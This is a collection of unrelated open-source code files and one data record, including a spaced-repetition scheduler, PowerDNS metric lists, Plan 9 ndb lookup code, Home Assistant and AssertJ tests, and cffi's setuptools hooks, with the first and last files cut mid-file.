      printf("Input was twelve\n");
      break;
    case 13:
      printf("Input was thirteen\n");
      break;
    case 19:
      printf("Input was nineteen\n");
      break;
    case 255:
      printf("Input was two hundred fifty-five\n");
      break;
    case 0x12389:
      printf("Really big input: 0x12389\n");
      break;
    case 0x1238A:
      printf("Really big input: 0x1238A\n");
      break;
    case 0x1238B:
      printf("Really big input: 0x1238B\n");
      break;
    case 0x1238C:
      printf("Really big input: 0x1238C\n");
      break;
    case 0x1238D:
      printf("Really big input: 0x1238D\n");
      break;
    case 0x1238F:
      printf("Really big input: 0x1238F\n");
      break;
    case 0x12390:
      printf("Really big input: 0x12390\n");
      break;
    case 0x12391:
      printf("Really big input: 0x12391\n");
      break;
    case 0x12392:
      printf("Really big input: 0x12392\n");
      break;
    case 0x12393:
      printf("Really big input: 0x12393\n");
      break;
    default:
      printf("Unknown input: %d\n", input);
  }
  return 0;
}
908
590
from datetime import datetime, timedelta
import random

# Spaced-repetition review intervals, in days, indexed by schedule tier:
# 0 -> 1 day
# 1 -> 3 days
# 2 -> 7 days
# 3 -> 14 days
# 4 -> 30 days
# 5 -> 90 days
# 6 -> 180 days
# 7 -> 365 days
_TIER_DAYS = {0: 1, 1: 3, 2: 7, 3: 14, 4: 30, 5: 90, 6: 180, 7: 365}


def get_time_delta(tier):
    """Return the review interval (timedelta) for a schedule tier.

    :param tier: integer tier in 0..7 (see _TIER_DAYS)
    :raises ValueError: for an unknown tier. (The previous if-chain left the
        local unbound and crashed with UnboundLocalError instead.)
    """
    try:
        return timedelta(days=_TIER_DAYS[tier])
    except KeyError:
        raise ValueError("unknown review tier: {!r}".format(tier))


def check_for_review(highlight, tier):
    """Return True when `highlight` is due for review.

    A highlight is due when more time than the tier's interval has passed
    since its `review_date` attribute.
    """
    return datetime.today() - highlight.review_date > get_time_delta(tier)


def order_highlights(highlights):
    """Bucket due highlights into per-tier lists.

    Shuffles `highlights` in place (as before), then for each highlight whose
    `review_schedule` tier bucket is not yet full (cap: the current user's
    `review_count`) and which is due per check_for_review, appends it to that
    tier's bucket. Returns a list of 8 lists, one per tier 0..7.
    """
    # Deferred import: flask_login needs an application/request context and
    # would make this module unimportable outside the Flask app.
    from flask_login import current_user

    tiers = [[] for _ in range(8)]
    random.shuffle(highlights)
    count = current_user.review_count
    for h in highlights:
        tier = h.review_schedule
        if 0 <= tier <= 7 and len(tiers[tier]) < count:
            if check_for_review(h, tier):
                tiers[tier].append(h)
    return tiers
1,344
663
# (C) Datadog, Inc. 2010-present # All rights reserved # Licensed under Simplified BSD License (see LICENSE) GAUGE_METRICS = [ 'cache-entries', 'concurrent-queries', 'failed-host-entries', 'negcache-entries', 'packetcache-entries', 'throttle-entries', ] RATE_METRICS = [ 'all-outqueries', 'answers-slow', 'answers0-1', 'answers1-10', 'answers10-100', 'answers100-1000', 'cache-hits', 'cache-misses', 'chain-resends', 'case-mismatches', 'client-parse-errors', 'dont-outqueries', 'ipv6-outqueries', 'ipv6-questions', 'malloc-bytes', 'noerror-answers', 'nxdomain-answers', 'max-mthread-stack', 'outgoing-timeouts', 'over-capacity-drops', 'packetcache-hits', 'packetcache-misses', 'policy-drops', 'qa-latency', 'questions', 'server-parse-errors', 'servfail-answers', 'spoof-prevents', 'sys-msec', 'tcp-client-overflow', 'tcp-clients', 'tcp-outqueries', 'tcp-questions', 'throttled-out', 'throttled-outqueries', 'unauthorized-tcp', 'unauthorized-udp', 'unexpected-packets', 'unreachables', ] GAUGE_METRICS_V4 = ['fd-usage'] RATE_METRICS_V4 = [ 'auth4-answers-slow', 'auth4-answers0-1', 'auth4-answers1-10', 'auth4-answers10-100', 'auth4-answers100-1000', 'auth6-answers-slow', 'auth6-answers0-1', 'auth6-answers1-10', 'auth6-answers10-100', 'auth6-answers100-1000', 'dlg-only-drops', 'dnssec-queries', 'dnssec-result-bogus', 'dnssec-result-indeterminate', 'dnssec-result-insecure', 'dnssec-result-nta', 'dnssec-result-secure', 'dnssec-validations', 'edns-ping-matches', 'edns-ping-mismatches', 'ignored-packets', 'no-packet-error', 'noedns-outqueries', 'noping-outqueries', 'nsset-invalidations', 'nsspeeds-entries', 'outgoing4-timeouts', 'outgoing6-timeouts', 'policy-result-custom', 'policy-result-drop', 'policy-result-noaction', 'policy-result-nodata', 'policy-result-nxdomain', 'policy-result-truncate', 'real-memory-usage', 'resource-limits', 'too-old-drops', 'udp-in-errors', 'udp-noport-errors', 'udp-recvbuf-errors', 'udp-sndbuf-errors', 'uptime', 'user-msec', ] METRIC_FORMAT = 
'powerdns.recursor.{}'
1,166
852
from __future__ import print_function
import FWCore.ParameterSet.SequenceTypes as sqt
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.Modules as mod


def getModulesFromSequence(sequence, list):
    # Recursively collect every _Module contained in `sequence` into `list`.
    # NOTE(review): the out-parameter is named `list`, shadowing the builtin;
    # kept as-is since the name is part of the public signature.
    item = sequence._seq
    if isinstance(item, mod._Module):
        list.append(item)
    elif isinstance(item, cms.Sequence):
        getModulesFromSequence(item, list)
    else:
        _getModulesFromOp(item, list)


def _getModulesFromOp(op, list):
    # Walk the attributes of a sequence operator node, descending into nested
    # sequences/sequenceable objects and appending any _Module found.
    for item in dir(op):
        o = getattr(op, item)
        if isinstance(o, mod._Module):
            list.append(o)
        elif isinstance(o, cms.Sequence):
            _getModulesFromOp(o, list)
        elif isinstance(o, sqt._Sequenceable):
            _getModulesFromOp(o, list)


def extractUsedOutputs(process):
    # Return the OutputModule instances that are actually referenced by the
    # process's end paths (i.e. outputs that will really run).
    allEndPathModules = []
    for name in process._Process__endpaths:
        endpath = getattr(process, name)
        list = []
        getModulesFromSequence(endpath, list)
        allEndPathModules.extend(list)
    allUsedOutputModules = []
    for module in allEndPathModules:
        if isinstance(module, cms.OutputModule):
            allUsedOutputModules.append(module)
    return allUsedOutputModules


if __name__ == "__main__":
    import unittest

    # Smoke tests: print collected-module counts for a few small processes.
    class TestPrintPath(unittest.TestCase):
        def testGetModules(self):
            p = cms.Process("Test")
            p.foo = cms.EDProducer("Foo")
            p.p = cms.Path(p.foo)
            list = []
            getModulesFromSequence(p.p, list)
            print(len(list))

            p = cms.Process("Test")
            p.foo = cms.OutputModule("Foo")
            p.bar = cms.OutputModule("Bar")
            p.unused = cms.OutputModule("Unused")
            p.p = cms.EndPath(p.foo * p.bar)
            usedOutputs = extractUsedOutputs(p)
            print(len(usedOutputs))

            p = cms.Process("Test")
            p.foo = cms.EDProducer("Foo")
            p.bar = cms.EDProducer("Bar")
            p.s = cms.Sequence(p.foo * p.bar)
            p.fii = cms.EDProducer("Fii")
            p.p = cms.Path(p.s * p.fii)
            list = []
            getModulesFromSequence(p.p, list)
            print(len(list))

    unittest.main()
1,180
348
<gh_stars>100-1000 {"nom":"Lessard-le-National","circ":"3ème circonscription","dpt":"Saône-et-Loire","inscrits":511,"abs":327,"votants":184,"blancs":18,"nuls":6,"exp":160,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":90},{"nuance":"LR","nom":"M. <NAME>","voix":70}]}
110
1,391
<filename>src/libndb/ndbgetval.c
#include <u.h>
#include <libc.h>
#include <bio.h>
#include "ndb.h"

/*
 *  search for a tuple that has the given 'attr=val' and also 'rattr=x'.
 *  copy 'x' into 'buf' and return the whole tuple.
 *
 *  return 0 if not found.
 */

/*
 * Like the above, but returns a malloc'd copy of the rattr value (caller
 * frees) and optionally hands back the whole tuple through pp (caller must
 * ndbfree it).  s may be nil; a temporary search state is used.
 * Returns nil when no matching tuple is found.
 */
char*
ndbgetvalue(Ndb *db, Ndbs *s, char *attr, char *val, char *rattr, Ndbtuple **pp)
{
	Ndbtuple *t, *nt;
	char *rv;
	Ndbs temps;

	if(s == nil)
		s = &temps;
	if(pp)
		*pp = nil;
	t = ndbsearch(db, s, attr, val);
	while(t){
		/* first look on same line (closer binding) */
		nt = s->t;
		for(;;){
			if(strcmp(rattr, nt->attr) == 0){
				rv = strdup(nt->val);
				if(pp != nil)
					*pp = t;
				else
					ndbfree(t);
				return rv;
			}
			/* nt->line links form a circular list; stop when we wrap */
			nt = nt->line;
			if(nt == s->t)
				break;
		}

		/* search whole tuple */
		for(nt = t; nt; nt = nt->entry){
			if(strcmp(rattr, nt->attr) == 0){
				rv = strdup(nt->val);
				if(pp != nil)
					*pp = t;
				else
					ndbfree(t);
				return rv;
			}
		}

		/* no rattr in this tuple; free it and try the next match */
		ndbfree(t);
		t = ndbsnext(s, attr, val);
	}
	return nil;
}

/*
 * Deprecated fixed-buffer wrapper around ndbgetvalue: copies the value into
 * buf, truncating to Ndbvlen-1 bytes plus NUL.  Returns the matched tuple
 * (caller frees) or nil.
 */
Ndbtuple*
ndbgetval(Ndb *db, Ndbs *s, char *attr, char *val, char *rattr, char *buf)
{
	Ndbtuple *t;
	char *p;

	p = ndbgetvalue(db, s, attr, val, rattr, &t);
	if(p == nil){
		if(buf != nil)
			*buf = 0;
	} else {
		if(buf != nil){
			strncpy(buf, p, Ndbvlen-1);
			buf[Ndbvlen-1] = 0;
		}
		free(p);
	}
	return t;
}
722
1,444
package mage.cards.e; import java.util.UUID; import mage.MageInt; import mage.abilities.Ability; import mage.abilities.common.BeginningOfUpkeepTriggeredAbility; import mage.abilities.common.LimitedTimesPerTurnActivatedAbility; import mage.abilities.condition.common.IsStepCondition; import mage.abilities.costs.Cost; import mage.abilities.costs.common.SacrificeTargetCost; import mage.abilities.effects.OneShotEffect; import mage.abilities.effects.common.counter.AddCountersSourceEffect; import mage.abilities.effects.common.counter.RemoveCounterSourceEffect; import mage.abilities.keyword.FirstStrikeAbility; import mage.abilities.keyword.TrampleAbility; import mage.cards.CardImpl; import mage.cards.CardSetInfo; import mage.constants.*; import mage.counters.CounterType; import static mage.filter.StaticFilters.FILTER_CONTROLLED_CREATURE_SHORT_TEXT; import mage.game.Game; import mage.game.permanent.Permanent; import mage.target.common.TargetControlledCreaturePermanent; /** * * @author fireshoes */ public final class EbonPraetor extends CardImpl { public EbonPraetor(UUID ownerId, CardSetInfo setInfo) { super(ownerId, setInfo, new CardType[]{CardType.CREATURE}, "{4}{B}{B}"); this.subtype.add(SubType.AVATAR); this.subtype.add(SubType.PRAETOR); this.power = new MageInt(5); this.toughness = new MageInt(5); // First strike this.addAbility(FirstStrikeAbility.getInstance()); // Trample this.addAbility(TrampleAbility.getInstance()); // At the beginning of your upkeep, put a -2/-2 counter on Ebon Praetor. this.addAbility(new BeginningOfUpkeepTriggeredAbility(new AddCountersSourceEffect(CounterType.M2M2.createInstance()), TargetController.YOU, false)); // Sacrifice a creature: Remove a -2/-2 counter from Ebon Praetor. If the sacrificed creature was a Thrull, put a +1/+0 counter on Ebon Praetor. Activate this ability only during your upkeep and only once each turn. 
Ability ability = new LimitedTimesPerTurnActivatedAbility(Zone.BATTLEFIELD, new RemoveCounterSourceEffect(CounterType.M2M2.createInstance()), new SacrificeTargetCost(new TargetControlledCreaturePermanent(FILTER_CONTROLLED_CREATURE_SHORT_TEXT)), 1, new IsStepCondition(PhaseStep.UPKEEP)); ability.addEffect(new EbonPraetorEffect()); this.addAbility(ability); } private EbonPraetor(final EbonPraetor card) { super(card); } @Override public EbonPraetor copy() { return new EbonPraetor(this); } } class EbonPraetorEffect extends OneShotEffect { public EbonPraetorEffect() { super(Outcome.BoostCreature); this.staticText = "If the sacrificed creature was a Thrull, put a +1/+0 counter on {this}"; } public EbonPraetorEffect(final EbonPraetorEffect effect) { super(effect); } @Override public EbonPraetorEffect copy() { return new EbonPraetorEffect(this); } @Override public boolean apply(Game game, Ability source) { for (Cost cost : source.getCosts()) { if (cost instanceof SacrificeTargetCost) { Permanent sacrificedCreature = ((SacrificeTargetCost) cost).getPermanents().get(0); Permanent sourceCreature = game.getPermanent(source.getSourceId()); if (sacrificedCreature.hasSubtype(SubType.THRULL, game) && sourceCreature != null) { sourceCreature.addCounters(CounterType.P1P0.createInstance(), source.getControllerId(), source, game); return true; } } } return true; } }
1,373
30,023
"""Tests for cloud tts."""
from unittest.mock import Mock

from hass_nabucasa import voice
import pytest
import voluptuous as vol

from homeassistant.components.cloud import const, tts


@pytest.fixture()
def cloud_with_prefs(cloud_prefs):
    """Return a cloud mock with prefs."""
    return Mock(client=Mock(prefs=cloud_prefs))


def test_default_exists():
    """Test our default language exists."""
    # The configured default voice must be a key of the voice map shipped by
    # hass_nabucasa, otherwise the TTS provider could not resolve it.
    assert const.DEFAULT_TTS_DEFAULT_VOICE in voice.MAP_VOICE


def test_schema():
    """Test schema."""
    assert "nl-NL" in tts.SUPPORT_LANGUAGES

    # When gender is omitted, the schema fills in "female" as the default.
    processed = tts.PLATFORM_SCHEMA({"platform": "cloud", "language": "nl-NL"})
    assert processed["gender"] == "female"

    # Unknown language must be rejected.
    with pytest.raises(vol.Invalid):
        tts.PLATFORM_SCHEMA(
            {"platform": "cloud", "language": "non-existing", "gender": "female"}
        )

    # Unsupported gender must be rejected.
    with pytest.raises(vol.Invalid):
        tts.PLATFORM_SCHEMA(
            {"platform": "cloud", "language": "nl-NL", "gender": "not-supported"}
        )

    # Should not raise
    tts.PLATFORM_SCHEMA({"platform": "cloud", "language": "nl-NL", "gender": "female"})
    tts.PLATFORM_SCHEMA({"platform": "cloud"})


async def test_prefs_default_voice(hass, cloud_with_prefs, cloud_prefs):
    """Test cloud provider uses the preferences."""
    assert cloud_prefs.tts_default_voice == ("en-US", "female")

    # Provider created without explicit config: follows the cloud prefs.
    provider_pref = await tts.async_get_engine(
        Mock(data={const.DOMAIN: cloud_with_prefs}), None, {}
    )
    # Provider created from explicit config: pinned to that config.
    provider_conf = await tts.async_get_engine(
        Mock(data={const.DOMAIN: cloud_with_prefs}),
        {"language": "fr-FR", "gender": "female"},
        None,
    )

    assert provider_pref.default_language == "en-US"
    assert provider_pref.default_options == {"gender": "female"}
    assert provider_conf.default_language == "fr-FR"
    assert provider_conf.default_options == {"gender": "female"}

    await cloud_prefs.async_update(tts_default_voice=("nl-NL", "male"))
    await hass.async_block_till_done()

    # Only the prefs-based provider tracks the updated default voice; the
    # config-based provider keeps its explicit settings.
    assert provider_pref.default_language == "nl-NL"
    assert provider_pref.default_options == {"gender": "male"}
    assert provider_conf.default_language == "fr-FR"
    assert provider_conf.default_options == {"gender": "female"}
async def test_provider_properties(cloud_with_prefs):
    """Test cloud provider."""
    provider = await tts.async_get_engine(
        Mock(data={const.DOMAIN: cloud_with_prefs}), None, {}
    )
    assert provider.supported_options == ["gender"]
    assert "nl-NL" in provider.supported_languages


async def test_get_tts_audio(cloud_with_prefs):
    """Test cloud provider."""
    # NOTE(review): despite its name, this test never calls get_tts_audio();
    # it duplicates test_provider_properties. Consider exercising the audio
    # path with a mocked voice backend, or removing the duplicate.
    provider = await tts.async_get_engine(
        Mock(data={const.DOMAIN: cloud_with_prefs}), None, {}
    )
    assert provider.supported_options == ["gender"]
    assert "nl-NL" in provider.supported_languages
1,087
12,278
// Copyright 2015 Peter Dimov.
//
// Distributed under the Boost Software License, Version 1.0.
//
// See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt

#include <boost/core/lightweight_test_trait.hpp>
#include <boost/mp11/list.hpp>
#include <type_traits>
#include <tuple>
#include <utility>

// Compile-time test matrix for mp_push_front: verifies prepending zero, one
// and two types onto empty and non-empty mp_list and std::tuple list types.
int main()
{
    using boost::mp11::mp_list;
    using boost::mp11::mp_push_front;

    // mp_list, empty
    using L1 = mp_list<>;

    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L1>, mp_list<>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L1, char[1]>, mp_list<char[1]>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L1, char[1], char[2]>, mp_list<char[1], char[2]>>));

    // mp_list, one element
    using L2 = mp_list<void>;

    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L2>, mp_list<void>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L2, char[1]>, mp_list<char[1], void>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L2, char[1], char[2]>, mp_list<char[1], char[2], void>>));

    // mp_list, several elements (incl. array and void types)
    using L3 = mp_list<int[], void, float>;

    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L3>, mp_list<int[], void, float>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L3, char[1]>, mp_list<char[1], int[], void, float>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L3, char[1], char[2]>, mp_list<char[1], char[2], int[], void, float>>));

    // std::tuple, empty — mp_push_front works on any list-like template
    using L4 = std::tuple<>;

    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L4>, std::tuple<>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L4, char>, std::tuple<char>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L4, char, wchar_t>, std::tuple<char, wchar_t>>));

    // std::tuple, one element
    using L5 = std::tuple<int>;

    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L5>, std::tuple<int>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L5, char>, std::tuple<char, int>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L5, char, wchar_t>, std::tuple<char, wchar_t, int>>));

    // std::tuple, two elements
    using L6 = std::tuple<int, int>;

    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L6>, std::tuple<int, int>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L6, char>, std::tuple<char, int, int>>));
    BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L6, char, wchar_t>, std::tuple<char, wchar_t, int, int>>));

    return boost::report_errors();
}
1,142
674
import os

try:
    basestring
except NameError:
    # Python 3.x: 'basestring' no longer exists; plain 'str' is the
    # only string base type we need to check against.
    basestring = str

def error(msg):
    # Abort the setup() run with a setuptools configuration error.
    from distutils.errors import DistutilsSetupError
    raise DistutilsSetupError(msg)

def execfile(filename, glob):
    # We use execfile() (here rewritten for Python 3) instead of
    # __import__() to load the build script.  The problem with
    # a normal import is that in some packages, the intermediate
    # __init__.py files may already try to import the file that
    # we are generating.
    with open(filename) as f:
        src = f.read()
    src += '\n'      # Python 2.6 compatibility
    code = compile(src, filename, 'exec')
    exec(code, glob, glob)

def add_cffi_module(dist, mod_spec):
    """Process one 'cffi_modules' entry of the form 'path/build.py:ffi_var'.

    Loads the build script, extracts and validates the FFI object, then
    registers on 'dist' either a generated C extension (API mode) or a
    generated pure-Python module (ABI mode).
    """
    from cffi.api import FFI

    if not isinstance(mod_spec, basestring):
        error("argument to 'cffi_modules=...' must be a str or a list of str,"
              " not %r" % (type(mod_spec).__name__,))
    mod_spec = str(mod_spec)
    try:
        build_file_name, ffi_var_name = mod_spec.split(':')
    except ValueError:
        error("%r must be of the form 'path/build.py:ffi_variable'" %
              (mod_spec,))
    if not os.path.exists(build_file_name):
        ext = ''
        # Helpful hint if the user wrote a dotted module path instead
        # of a file path.
        rewritten = build_file_name.replace('.', '/') + '.py'
        if os.path.exists(rewritten):
            ext = ' (rewrite cffi_modules to [%r])' % (
                rewritten + ':' + ffi_var_name,)
        error("%r does not name an existing file%s" % (build_file_name, ext))

    mod_vars = {'__name__': '__cffi__', '__file__': build_file_name}
    execfile(build_file_name, mod_vars)

    try:
        ffi = mod_vars[ffi_var_name]
    except KeyError:
        error("%r: object %r not found in module" % (mod_spec,
                                                     ffi_var_name))
    if not isinstance(ffi, FFI):
        ffi = ffi()      # maybe it's a function instead of directly an ffi
    if not isinstance(ffi, FFI):
        error("%r is not an FFI instance (got %r)" % (mod_spec,
                                                      type(ffi).__name__))
    if not hasattr(ffi, '_assigned_source'):
        error("%r: the set_source() method was not called" % (mod_spec,))
    module_name, source, source_extension, kwds = ffi._assigned_source
    if ffi._windows_unicode:
        kwds = kwds.copy()
        ffi._apply_windows_unicode(kwds)

    if source is None:
        # ABI mode: emit a pure-Python module.
        _add_py_module(dist, ffi, module_name)
    else:
        # API mode: emit and compile a C extension module.
        _add_c_module(dist, ffi, module_name, source, source_extension, kwds)

def _add_c_module(dist, ffi, module_name, source, source_extension, kwds):
    # Register a distutils Extension whose C source file is generated lazily
    # by a patched 'build_ext' command just before compilation.
    from distutils.core import Extension
    from distutils.command.build_ext import build_ext
    from distutils.dir_util import mkpath
    from distutils import log
    from cffi import recompiler

    # '$PLACEHOLDER' marks the not-yet-generated C source; it is replaced
    # with the real path the first time build_ext runs.
    allsources = ['$PLACEHOLDER']
    allsources.extend(kwds.pop('sources', []))
    ext = Extension(name=module_name, sources=allsources, **kwds)

    def make_mod(tmpdir, pre_run=None):
        c_file = os.path.join(tmpdir, module_name + source_extension)
        log.info("generating cffi module %r" % c_file)
        mkpath(tmpdir)
        # a setuptools-only, API-only hook: called with the "ext" and "ffi"
        # arguments just before we turn the ffi into C code.  To use it,
        # subclass the 'distutils.command.build_ext.build_ext' class and
        # add a method 'def pre_run(self, ext, ffi)'.
        if pre_run is not None:
            pre_run(ext, ffi)
        updated = recompiler.make_c_source(ffi, module_name, source, c_file)
        if not updated:
            log.info("already up-to-date")
        return c_file

    if dist.ext_modules is None:
        dist.ext_modules = []
    dist.ext_modules.append(ext)

    # Subclass whatever 'build_ext' is already configured, so we compose
    # with other tools that patch the command class.
    base_class = dist.cmdclass.get('build_ext', build_ext)
    class build_ext_make_mod(base_class):
        def run(self):
            if ext.sources[0] == '$PLACEHOLDER':
                pre_run = getattr(self, 'pre_run', None)
                ext.sources[0] = make_mod(self.build_temp, pre_run)
            base_class.run(self)
    dist.cmdclass['build_ext'] = build_ext_make_mod
    # NB. multiple runs here will create multiple 'build_ext_make_mod'
    # classes.  Even in this case the 'build_ext' command should be
    # run once; but just in case, the logic above does nothing if
    # called again.
def _add_py_module(dist, ffi, module_name):
    # Register generation of a pure-Python (ABI-mode) cffi module by patching
    # both 'build_py' (normal builds) and 'build_ext' (for "build_ext -i").
    from distutils.dir_util import mkpath
    from distutils.command.build_py import build_py
    from distutils.command.build_ext import build_ext
    from distutils import log
    from cffi import recompiler

    def generate_mod(py_file):
        log.info("generating cffi module %r" % py_file)
        mkpath(os.path.dirname(py_file))
        updated = recompiler.make_py_source(ffi, module_name, py_file)
        if not updated:
            log.info("already up-to-date")

    # Compose with whatever 'build_py' command class is already configured.
    base_class = dist.cmdclass.get('build_py', build_py)
    class build_py_make_mod(base_class):
        def run(self):
            base_class.run(self)
            module_path = module_name.split('.')
            module_path[-1] += '.py'
            generate_mod(os.path.join(self.build_lib, *module_path))
    dist.cmdclass['build_py'] = build_py_make_mod

    # the following is only for "build_ext -i"
    base_class_2 = dist.cmdclass.get('build_ext', build_ext)
    class build_ext_make_mod(base_class_2):
        def run(self):
            base_class_2.run(self)
            if self.inplace:
                # from get_ext_fullpath() in distutils/command/build_ext.py
                module_path = module_name.split('.')
                package = '.'.join(module_path[:-1])
                build_py = self.get_finalized_command('build_py')
                package_dir = build_py.get_package_dir(package)
                file_name = module_path[-1] + '.py'
                generate_mod(os.path.join(package_dir, file_name))
    dist.cmdclass['build_ext'] = build_ext_make_mod

def cffi_modules(dist, attr, value):
    # setuptools entry point for the 'cffi_modules' keyword of setup().
    # 'value' may be a single spec string or a list of them.
    assert attr == 'cffi_modules'
    if isinstance(value, basestring):
        value = [value]

    for cffi_module in value:
        add_cffi_module(dist, cffi_module)
2,763
363
/*
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 * the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
 * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations under the License.
 *
 * Copyright 2012-2021 the original author or authors.
 */
package org.assertj.core.api.junit.jupiter;

import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.catchThrowable;
import static org.mockito.BDDMockito.given;
import static org.mockito.Mockito.mock;

import java.lang.reflect.Executable;
import java.lang.reflect.Parameter;

import org.assertj.core.api.AbstractSoftAssertions;
import org.assertj.core.api.BDDSoftAssertions;
import org.assertj.core.api.SoftAssertions;
import org.assertj.core.api.SoftAssertionsProvider;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.DisplayName;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtensionContext;
import org.junit.jupiter.api.extension.ParameterContext;
import org.junit.jupiter.api.extension.ParameterResolutionException;

/**
 * Unit tests for {@link SoftAssertionsExtension}.
 *
 * @author <NAME>
 * @since 3.13
 * @see SoftAssertionsExtensionIntegrationTest
 * @see BDDSoftAssertionsExtensionIntegrationTest
 */
@DisplayName("JUnit Jupiter Soft Assertions extension")
class SoftAssertionsExtensionUnitTest {

  // Extension under test plus mocked JUnit 5 parameter-resolution contexts;
  // each test wires the mocks to point at a method of the MyTests fixture.
  private final SoftAssertionsExtension extension = new SoftAssertionsExtension();
  private final ParameterContext parameterContext = mock(ParameterContext.class);
  private final ExtensionContext extensionContext = mock(ExtensionContext.class);

  @Test
  void supports_soft_assertions() throws Exception {
    // GIVEN
    Executable executable = MyTests.class.getMethod("softAssertions", SoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext);
    // THEN
    assertThat(supportsParameter).isTrue();
  }

  @Test
  void supports_bdd_soft_assertions() throws Exception {
    // GIVEN
    Executable executable = MyTests.class.getMethod("bddSoftAssertions", BDDSoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext);
    // THEN
    assertThat(supportsParameter).isTrue();
  }

  @Test
  void supports_custom_soft_assertions() throws Exception {
    // GIVEN
    Executable executable = MyTests.class.getMethod("customSoftAssertions", MySoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext);
    // THEN
    assertThat(supportsParameter).isTrue();
  }

  @Test
  void does_not_support_string() throws Exception {
    // GIVEN: a parameter whose type is not a SoftAssertionsProvider
    Executable executable = MyTests.class.getMethod("string", String.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    boolean supportsParameter = extension.supportsParameter(parameterContext, extensionContext);
    // THEN
    assertThat(supportsParameter).isFalse();
  }

  @Test
  void does_not_support_abstract_soft_assertions() throws Exception {
    // GIVEN: a provider type that cannot be instantiated (abstract)
    Executable executable = MyTests.class.getMethod("abstractCustomSoftAssertions", MyAbstractSoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext));
    // THEN
    assertThat(exception).isInstanceOf(ParameterResolutionException.class)
                         .hasMessageStartingWith("Configuration error: the resolved SoftAssertionsProvider implementation [%s] is abstract and cannot be instantiated",
                                                 executable);
  }

  @Test
  void does_not_support_soft_assertions_with_no_default_constructor() throws Exception {
    // GIVEN: a provider type lacking a no-arg constructor
    Executable executable = MyTests.class.getMethod("noDefaultConstructorCustomSoftAssertions",
                                                    MyNoDefaultConstructorSoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext));
    // THEN
    assertThat(exception).isInstanceOf(ParameterResolutionException.class)
                         .hasMessageStartingWith("Configuration error: the resolved SoftAssertionsProvider implementation [%s] has no default constructor and cannot be instantiated",
                                                 executable);
  }

  @Test
  void does_not_support_constructor() throws Exception {
    // GIVEN: injection is only supported into test methods, not constructors
    Executable executable = MyTests.class.getDeclaredConstructor(SoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext));
    // THEN
    assertThat(exception).isInstanceOf(ParameterResolutionException.class)
                         .hasMessageStartingWith("Configuration error: cannot resolve SoftAssertionsProvider instances for");
  }

  @Test
  void does_not_support_lifecycle_method() throws Exception {
    // GIVEN: injection is not supported into lifecycle methods like @BeforeEach
    Executable executable = MyTests.class.getMethod("beforeEach", SoftAssertions.class);
    Parameter parameter = executable.getParameters()[0];
    given(parameterContext.getParameter()).willReturn(parameter);
    given(parameterContext.getDeclaringExecutable()).willReturn(executable);
    // WHEN
    Throwable exception = catchThrowable(() -> extension.supportsParameter(parameterContext, extensionContext));
    // THEN
    assertThat(exception).isInstanceOf(ParameterResolutionException.class)
                         .hasMessageStartingWith("Configuration error: cannot resolve SoftAssertionsProvider instances for")
                         .hasMessageContaining("beforeEach");
  }

  private static abstract class MyAbstractSoftAssertions implements SoftAssertionsProvider {
  }

  private static class MyNoDefaultConstructorSoftAssertions extends AbstractSoftAssertions {
